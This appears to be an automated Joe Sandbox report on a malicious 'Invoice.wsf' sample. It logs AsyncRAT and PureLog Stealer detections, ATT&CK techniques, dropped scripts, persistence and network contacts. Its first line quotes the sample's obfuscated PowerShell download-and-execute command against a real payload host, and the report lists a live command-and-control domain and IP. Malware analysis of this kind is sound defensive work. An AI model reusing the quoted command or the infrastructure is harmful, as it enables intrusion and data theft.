                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]];$a123='iex(new-object net.w';$b456='ebclient).downlo';[byte[]];$c789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.replace('-@-@-@-$-%^','adstring');[byte[]];iex($a123+$b456+$c789)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Yara detected AsyncRAT
                Source: Yara matchFile source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR
                Source: RegSvcs.exe, 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.2389d3d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.23886ebeab0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.2389d3d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.23886ebeab0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information222
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		222
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		OS Credential Dumping1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		1
                DLL Side-Loading                		311
                Process Injection                		11
                Deobfuscate/Decode Files or Information                		LSASS Memory13
                System Information Discovery                		Remote Desktop ProtocolData from Removable Media11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		121
                Obfuscated Files or Information                		Security Account Manager121
                Security Software Discovery                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts11
                Command and Scripting Interpreter                		Login HookLogin Hook2
                Software Packing                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts1
                Scheduled Task/Job                		Network Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets21
                Virtualization/Sandbox Evasion                		SSHKeylogging213
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable Media3
                PowerShell                		RC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Virtualization/Sandbox Evasion                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501359 Sample: Invoice.wsf Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 37 kareemovic11.duckdns.org 2->37 39 afclifescience-tiurma.com 2->39 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 59 17 other signatures 2->59 9 wscript.exe 14 2->9         started        13 wscript.exe 1 2->13         started        signatures3 57 Uses dynamic DNS services 37->57 process4 dnsIp5 41 afclifescience-tiurma.com 192.185.141.13, 443, 49730, 49731 UNIFIEDLAYER-AS-1US United States 9->41 67 System process connects to network (likely due to code injection or exploit) 9->67 69 VBScript performs obfuscated calls to suspicious functions 9->69 71 Suspicious powershell command line found 9->71 77 2 other signatures 9->77 15 powershell.exe 14 18 9->15         started        73 Wscript starts Powershell (via cmd or directly) 13->73 75 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->75 18 cmd.exe 1 13->18         started        signatures6 process7 file8 31 C:\Users\...\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs, ASCII 15->31 dropped 33 C:\Users\...\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1, ASCII 15->33 dropped 35 C:\Users\...\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat, ASCII 15->35 dropped 21 conhost.exe 15->21         started        45 Suspicious powershell command line found 18->45 47 Wscript starts Powershell (via cmd or directly) 18->47 49 Bypasses PowerShell execution policy 18->49 23 powershell.exe 15 18->23         started        26 conhost.exe 18->26         started        signatures9 process10 signatures11 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->61 63 Writes to foreign memory regions 23->63 65 Injects a PE file into a foreign processes 23->65 28 RegSvcs.exe 2 23->28         started        process12 dnsIp13 43 kareemovic11.duckdns.org 104.243.37.177, 49738, 7707 RELIABLESITEUS United States 28->43

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Invoice.wsf5%ReversingLabsDocument-HTML.Hacktool.Generic

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://oneget.orgX0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://oneget.org0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                https://afclifescience-tiurma.com/jxs.txtsC:0%Avira URL Cloudsafe
                https://afclifescience-tiurma.com/jxs.txtLMEMX0%Avira URL Cloudsafe
                https://afclifescience-tiurma.com/jxs.txt0%Avira URL Cloudsafe
                kareemovic11.duckdns.org100%Avira URL Cloudmalware
                https://afclifescience-tiurma.com/jxs.txtkR0%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                https://afclifescience-tiurma.LWD0%Avira URL Cloudsafe
                https://afclifescience-tiurma.com/rkem.jpg0%Avira URL Cloudsafe
                https://afclifescience-tiurma.com/jxs.txtWRx0%Avira URL Cloudsafe
                https://afclifescience-tiurma.com/jxs.txtc0%Avira URL Cloudsafe
                https://afclifescience-tiurma.com/rkem.jpgX0%Avira URL Cloudsafe
                https://afclifescience-tiurma.com0%Avira URL Cloudsafe
                http://afclifescience-tiurma.com0%Avira URL Cloudsafe
                https://afclifescience-tiurma.com/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                afclifescience-tiurma.com
                		192.185.141.13
                		truetrue
                  		unknown
                  kareemovic11.duckdns.org
                  		104.243.37.177
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://afclifescience-tiurma.com/jxs.txttrue
                    • Avira URL Cloud: safe
                    		unknown
                    kareemovic11.duckdns.orgtrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://afclifescience-tiurma.com/rkem.jpgtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://afclifescience-tiurma.com/jxs.txtLMEMXwscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://go.micropowershell.exe, 00000001.00000002.1718048847.0000021E8E4DF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://afclifescience-tiurma.com/jxs.txtkRwscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://afclifescience-tiurma.com/jxs.txtsC:wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://afclifescience-tiurma.LWDwscript.exe, 00000000.00000002.1753518951.000002092EA81000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://afclifescience-tiurma.com/jxs.txtWRxwscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://afclifescience-tiurma.com/jxs.txtcwscript.exe, 00000000.00000003.1660289317.0000020930687000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://afclifescience-tiurma.com/wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://oneget.orgXpowershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://afclifescience-tiurma.com/rkem.jpgXpowershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://afclifescience-tiurma.compowershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8DB31000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://afclifescience-tiurma.compowershell.exe, 00000001.00000002.1718048847.0000021E8F05D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://oneget.orgpowershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.243.37.177
                    		kareemovic11.duckdns.orgUnited States
                    		23470RELIABLESITEUStrue
                    192.185.141.13
                    		afclifescience-tiurma.comUnited States
                    		46606UNIFIEDLAYER-AS-1UStrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1501359
                    Start date and time:2024-08-29 19:41:04 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 7s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Invoice.wsf
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winWSF@13/9@2/2
                    EGA Information:
                    • Successful, ratio: 33.3%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 65
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Found application associated with file extension: .wsf
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 1344 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7104 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: Invoice.wsf

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    13:41:55API Interceptor83x Sleep call for process: powershell.exe modified
                    13:42:51API Interceptor8745163x Sleep call for process: RegSvcs.exe modified
                    18:41:59Task SchedulerRun new task: Windows DuckDown Reflection taskFolder true path: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    192.185.141.13THYH-1148073298.xlsbGet hashmaliciousHidden Macro 4.0Browse
                      THYH-1148073298.xlsbGet hashmaliciousHidden Macro 4.0Browse
                        THYH-1981400587.xlsbGet hashmaliciousHidden Macro 4.0Browse
                          THYH-1981400587.xlsbGet hashmaliciousHidden Macro 4.0Browse
                            THYH-1981400587.xlsbGet hashmaliciousHidden Macro 4.0Browse
                              THYH-1004058603.xlsbGet hashmaliciousHidden Macro 4.0Browse
                                THYH-1004058603.xlsbGet hashmaliciousHidden Macro 4.0Browse

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  UNIFIEDLAYER-AS-1UShttp://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                  • 162.241.252.155
                                  https://alkimialofts.com/on%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/Get hashmaliciousHTMLPhisherBrowse
                                  • 108.179.194.43
                                  Message-ID 08282024 110831 PM.pdfGet hashmaliciousHTMLPhisherBrowse
                                  • 192.254.189.196
                                  bintoday1.exeGet hashmaliciousFormBookBrowse
                                  • 198.57.245.28
                                  Document_pdf.exeGet hashmaliciousFormBookBrowse
                                  • 162.240.81.18
                                  https://thb.oui.mybluehost.me/Betalingsservice/betalGet hashmaliciousUnknownBrowse
                                  • 162.241.217.174
                                  Hua San Particulars.doc.scr.exeGet hashmaliciousAgentTeslaBrowse
                                  • 50.87.144.157
                                  BULK HARVEST - VESSEL PARTICULARS.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                                  • 50.87.144.157
                                  Catalina - Particulars.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                  • 50.87.144.157
                                  rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                                  • 162.241.226.190
                                  RELIABLESITEUSRavakhu24105.exeGet hashmaliciousRemcosBrowse
                                  • 185.150.191.117
                                  Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.243.47.142
                                  232.exeGet hashmaliciousRedLine, SectopRATBrowse
                                  • 194.26.29.100
                                  rebate.exeGet hashmaliciousRedLine, SectopRATBrowse
                                  • 194.26.29.100
                                  C0DcOwxwfi.exeGet hashmaliciousRedLineBrowse
                                  • 194.26.29.100
                                  MsvL2pjs5Y.exeGet hashmaliciousAveMaria, WhiteSnake StealerBrowse
                                  • 195.7.5.161
                                  47CkiftRs9.exeGet hashmaliciousUnknownBrowse
                                  • 172.93.106.189
                                  7GfciIf7ys.exeGet hashmaliciousUnknownBrowse
                                  • 172.93.106.189
                                  AK4UlXhsnL.exeGet hashmaliciousUnknownBrowse
                                  • 172.93.103.101
                                  https://bhaez.cuakss.biz.id/Get hashmaliciousUnknownBrowse
                                  • 172.96.160.168

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win64.DropperX-gen.8867.28776.exeGet hashmaliciousUnknownBrowse
                                  • 192.185.141.13
                                  SecuriteInfo.com.Win64.DropperX-gen.8867.28776.exeGet hashmaliciousUnknownBrowse
                                  • 192.185.141.13
                                  http://getquckbulck.topGet hashmaliciousUnknownBrowse
                                  • 192.185.141.13
                                  z47maaaaaaaaaaaaax.exeGet hashmaliciousAgentTeslaBrowse
                                  • 192.185.141.13
                                  https://decktop.us/MUYKd1Get hashmaliciousUnknownBrowse
                                  • 192.185.141.13
                                  Page1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 192.185.141.13
                                  Detailed Itinerary.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                  • 192.185.141.13
                                  https://tmx.velsol.com/Reporting/Document.aspx?MasterAgreementID=i1339-005394573&ID=aQAxADMAMwA5AC0AMAAwADUAMwA5ADQANQA3ADMA.Get hashmaliciousUnknownBrowse
                                  • 192.185.141.13
